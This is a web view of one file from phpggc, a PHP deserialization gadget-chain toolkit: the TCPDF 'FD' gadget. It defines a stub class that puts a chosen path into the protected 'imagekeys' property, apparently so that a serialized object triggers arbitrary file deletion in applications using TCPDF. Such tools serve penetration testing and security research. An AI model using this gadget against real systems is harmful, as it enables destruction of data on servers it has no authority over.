Codebase list phpggc / 419dcfa gadgetchains / TCPDF / FD / 1 / gadgets.php
419dcfa

Tree @419dcfa (Download .tar.gz)

gadgets.php @419dcfaraw · history · blame

<?php

class TCPDF {
    protected $imagekeys;
    
    function __construct($remote_path) {
		$this->imagekeys = [
		    $remote_path
        ];
    }
}